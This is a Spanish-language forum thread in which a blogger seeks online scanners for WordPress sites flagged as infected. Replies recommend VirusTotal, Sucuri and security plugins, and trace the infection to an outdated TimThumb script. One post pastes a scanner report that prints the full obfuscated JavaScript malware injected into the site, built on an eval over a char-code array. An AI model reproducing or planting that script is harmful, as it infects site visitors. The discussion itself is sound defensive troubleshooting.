¿Antivirus online para webs?

israelyance · 13 Dic 2012

Betas, una consulta.

Estoy buscando antivirus online que me scaneen mis blogs y verificar si hay problemas de virus, exploits, troyanos, etc, ya que estoy compartiendo mis blogs en facebook y me dicen en comentarios que le aparece que hay troyano/exploits. Yo ya le pasé antivirus que hay en mi cpanel, de mi proveeedor de hosting: banahosting, y no me aparece nada, busqué antivirus online por google, los he pasado por algunos de ellos y tampoco hay nada, por eso pregunto por lo que ustedes conozcan, que estén actualizados y sean buenos para verificar.

No voy a compartir ningún dominio por seguridad.

Gracias.

NASH · 13 Dic 2012

israelyance dijo:
Betas, una consulta.

Estoy buscando antivirus online que me scaneen mis blogs y verificar si hay problemas de virus, exploits, troyanos, etc, ya que estoy compartiendo mis blogs en facebook y me dicen en comentarios que le aparece que hay troyano/exploits. Yo ya le pasé antivirus que hay en mi cpanel, de mi proveeedor de hosting: banahosting, y no me aparece nada, busqué antivirus online por google, los he pasado por algunos de ellos y tampoco hay nada, por eso pregunto por lo que ustedes conozcan, que estén actualizados y sean buenos para verificar.

No voy a compartir ningún dominio por seguridad.

Gracias.

Hola Israel. Hay un plugin para Wordpress (supongo que lo utilizas en el blog que mencionas) llamado Antivirus.

Radick · 13 Dic 2012

Vaya, me lo anoto por si acaso.

NASH dijo:
Hola Israel. Hay un plugin para Wordpress (supongo que lo utilizas en el blog que mencionas) llamado Antivirus.

krusty72 · 13 Dic 2012

https://www.virustotal.com/

Sucuri SiteCheck - Free Website Malware Scanner

Virustotal es uno de los mejores, hace poco fue comprado por Google.

israelyance · 13 Dic 2012

Ayer le pasé virustotal y sucuri.net y no me salio nada en ninguna de mis webs, hoy en las mismas webs me sale lo mismo. En virustotal me aparece que el analizador SCUMWARE.org lo detecta como Malware site y en todos los demás analizadores esta limpio. En sucuri.net me sale:

Insertar CODE, HTML o PHP:

Known javascript malware. 
Details: http://sucuri.net/malware/malware-entry-mwanomalysp7
<script type="text/javascript" language="javascript" > try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{window.document.body++}catch(gdsgsdg){dbshre=199;}}}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,97,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,97,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,103,106,98,103,96,96,101,105,102,92,101,108,92,95,105,107,93,107,40,94,102,101,40,106,109,102,107,109,98,106,91,103,103,110,100,90,107,40,93,106,108,102,109,95,109,37,104,97,106,34,50,5,3,26,27,23,24,95,40,110,107,113,101,95,41,103,103,108,99,111,96,103,103,26,56,23,31,90,92,110,102,100,110,110,96,30,51,6,4,27,23,24,25,96,41,106,108,114,102,96,37,90,104,108,95,92,106,25,55,27,30,40,32,53,8,1,24,25,26,27,93,38,108,110,116,99,93,39,98,96,96,95,97,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,97,37,107,109,115,103,92,38,112,99,95,107,96,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,95,40,110,107,113,101,95,41,99,93,95,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,97,37,107,109,115,103,92,38,109,105,107,23,53,25,33,44,103,112,32,53,8,1,5,3,26,27,23,24,98,96,27,31,25,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,95,33,36,32,24,116,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,97,83,31,55,54,42,91,97,111,56,34,32,51,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,95,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,96,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s="";for(i=0;i-470!=0;i++){if(020==0x10)s+=String.fromCharCode(1*asgq[i]-(i%5-9));}z=s;e(z);}</script>

Ahora, supongo que si hay un virus este es nuevo y por eso ayer no lo detectó y hoy sí, o esta reconociendo erróneamente algún archivo como virus, cosa que pensé al inicio pero ahora ya lo estoy dudando.

¿Ahora como lo limpio?, en banahosting lo scanee otra vez y no me sale nada.

Voy a probar WordPress › AntiVirus « WordPress Plugins y les comento, ojalá funcione, igual pueden dar otras alternativas =)

ramonjosegn · 13 Dic 2012

krusty72 dijo:
https://www.virustotal.com/
Virustotal es uno de los mejores, hace poco fue comprado por Google.

fue el único que me funcionó en una ocasión que tuve mi web infectada, por supuesto corté por lo sano, reinstalé todo...

- - - Actualizado - - -

israelyance dijo:
Voy a probar WordPress › AntiVirus « WordPress Plugins y les comento, ojalá funcione, igual pueden dar otras alternativas =)

da muchos falsos positivos!!!!

Nicolas · 13 Dic 2012

http://forobeta.com/charla-blogger/96441-aporte-google-te-informa-tu-sitio-virus-o-no.html

Por ahí te sirve :encouragement:

israelyance · 13 Dic 2012

He reinstalado los blogs, solo he copiado parte importante de la carpeta content y editado antes el código de las plantillas donde se ha colado código extraño en los últimos días.

Para dos webs virustotal me sigue saliendo lo mismo, pero sucuri.net ya me sale limpio.

Analizando con el plugin antivirus me sale código que puede ser malicioso en los themes, no he copiado directamente los theme originales porque las últimas versiones tenían modificaciones de diseño que seria pesado volver a editar, pero reviso los supuestos códigos maliciosos con los theme original y luego de editar algunos me quedan estos.

Este usa el theme forester de theme-junkie

Insertar CODE, HTML o PHP:

[B]functions:[/B]
#print_r(base64_encode(serialize($valuesArray))); exit;

[B]header:[/B]
... ome()) add_filter('img_caption_shortcode', create_function('$a, $b, $c','return $c;'), 10, 3); ?>
... ory()) add_filter('img_caption_shortcode', create_function('$a, $b, $c','return $c;'), 10, 3); ?>

Este usa el theme garden de theme-junkie:

Insertar CODE, HTML o PHP:

[B]timthumb:[/B]
$imgData = base64_decode("R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAA ...
... WXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb DULB3RP6JuPuaGfuuV4fumf8Puvq ...
... C2NQ5MQ4ZNao9Ynzjl9ScNYpnebnDULB3RP6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=");
if(! is_file($this->cachefile)){
} else if(is_file($this->cachefile)){ //If it's not a local reque ...
if(! is_file($lastCleanFile)){
... 'png' && OPTIPNG_ENABLED && OPTIPNG_PATH && @is_file(OPTIPNG_PATH)){
... ng' && PNGCRUSH_ENABLED && PNGCRUSH_PATH && @is_file(PNGCRUSH_PATH)){
if(is_file($tempfile2)){
$fp = fopen($tempfile,'r',0,$context);
...

No sé mucho de códigos pero creo que son normales, ¿no?

ramonjosegn · 13 Dic 2012

Usa Wordfence, con eso restauras el Wordpress... si el problema es con el theme, simplemente vuelve a subir los archivos que pienses que se alteraron...

Revisa también que no tengas un nuevo administrador creado (así es como meten la mayoría de virus)

Cicklow · 13 Dic 2012

israelyance dijo:
He reinstalado los blogs, solo he copiado parte importante de la carpeta content y editado antes el código de las plantillas donde se ha colado código extraño en los últimos días.

Para dos webs virustotal me sigue saliendo lo mismo, pero sucuri.net ya me sale limpio.

Analizando con el plugin antivirus me sale código que puede ser malicioso en los themes, no he copiado directamente los theme originales porque las últimas versiones tenían modificaciones de diseño que seria pesado volver a editar, pero reviso los supuestos códigos maliciosos con los theme original y luego de editar algunos me quedan estos.

Este usa el theme forester de theme-junkie

Insertar CODE, HTML o PHP:

[B]functions:[/B] #print_r(base64_encode(serialize($valuesArray))); exit; [B]header:[/B] ... ome()) add_filter('img_caption_shortcode', create_function('$a, $b, $c','return $c;'), 10, 3); ?> ... ory()) add_filter('img_caption_shortcode', create_function('$a, $b, $c','return $c;'), 10, 3); ?>

Este usa el theme garden de theme-junkie:

Insertar CODE, HTML o PHP:

[B]timthumb:[/B] $imgData = base64_decode("R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAA ... ... WXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb DULB3RP6JuPuaGfuuV4fumf8Puvq ... ... C2NQ5MQ4ZNao9Ynzjl9ScNYpnebnDULB3RP6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs="); if(! is_file($this->cachefile)){ } else if(is_file($this->cachefile)){ //If it's not a local reque ... if(! is_file($lastCleanFile)){ ... 'png' && OPTIPNG_ENABLED && OPTIPNG_PATH && @is_file(OPTIPNG_PATH)){ ... ng' && PNGCRUSH_ENABLED && PNGCRUSH_PATH && @is_file(PNGCRUSH_PATH)){ if(is_file($tempfile2)){ $fp = fopen($tempfile,'r',0,$context); ...

No sé mucho de códigos pero creo que son normales, ¿no?

tu problema esta en thinithumb, estas usando una version vieja, actualiza a una nueva, muchos themes vienen con la version con bugs del tinithumbs, y esa version permite colocar codigos dentro de tu web, elimina el tinithumbs.php de la carpeta theme, luego vacia la carpeta del cache de los thumbs y subi la nueva version
timthumb - image crop zoom resize management - Google Project Hosting

ramonjosegn · 13 Dic 2012

Hay un plugin para mantener Thimbthumb actualizado, es más, si queda desfasado por lo que vi el sitio web se bloquea (eso no me agradó mucho)

israelyance · 13 Dic 2012

cicklow dijo:
tu problema esta en thinithumb, estas usando una version vieja, actualiza a una nueva, muchos themes vienen con la version con bugs del tinithumbs, y esa version permite colocar codigos dentro de tu web, elimina el tinithumbs.php de la carpeta theme, luego vacia la carpeta del cache de los thumbs y subi la nueva version
timthumb - image crop zoom resize management - Google Project Hosting

Consulta, ¿eso afectaría mis themes?

IGNACIO · 13 Dic 2012

yo probé varios pero pasaba que me dejaba sin accesos a usuarios de algunos países...

Cicklow · 13 Dic 2012

israelyance dijo:
Consulta, ¿eso afectaría mis themes?

nono el file ese lo unico que hace es crear un cache de las imagenes, solo pra eso lo colocan, pero tu theme esta desactualizado con la version del timthumb por eso te inyectaron el virus. Elimina el cache (en la carpeta del theme tenes de seguro una carpeta cache, elimina todo el contenido) y subi el nuevo timbthumb.php

israelyance · 13 Dic 2012

cicklow dijo:
nono el file ese lo unico que hace es crear un cache de las imagenes, solo pra eso lo colocan, pero tu theme esta desactualizado con la version del timthumb por eso te inyectaron el virus. Elimina el cache (en la carpeta del theme tenes de seguro una carpeta cache, elimina todo el contenido) y subi el nuevo timbthumb.php

En uno de mis themes el archivo se llama post-thumbnails.php y no hay una carpeta cache, en las demás sí las había, las he eliminado y reeemplazado el thumbnail.php. ¿También se procede igual?

Gracias de antemano.

Cicklow · 13 Dic 2012

israelyance dijo:
En uno de mis themes el archivo se llama post-thumbnails.php y no hay una carpeta cache, en las demás sí las había, las he eliminado y reeemplazado el thumbnail.php. ¿También se procede igual?

Gracias de antemano.

fijate si ese post-thumbnails.php es el timithumbs, puede ser ke le han cambiado el nombre, por mas que no uses los otros themes si los tenes en tu server corres el riesgo que tmb te accedan. Has echo bien en eliminar los demas!

¿Antivirus online para webs?

israelyance

NASH

Radick

krusty72

israelyance

ramonjosegn

Nicolas

israelyance

ramonjosegn

Cicklow

ramonjosegn

israelyance

IGNACIO

Cicklow

israelyance

Cicklow

Temas similares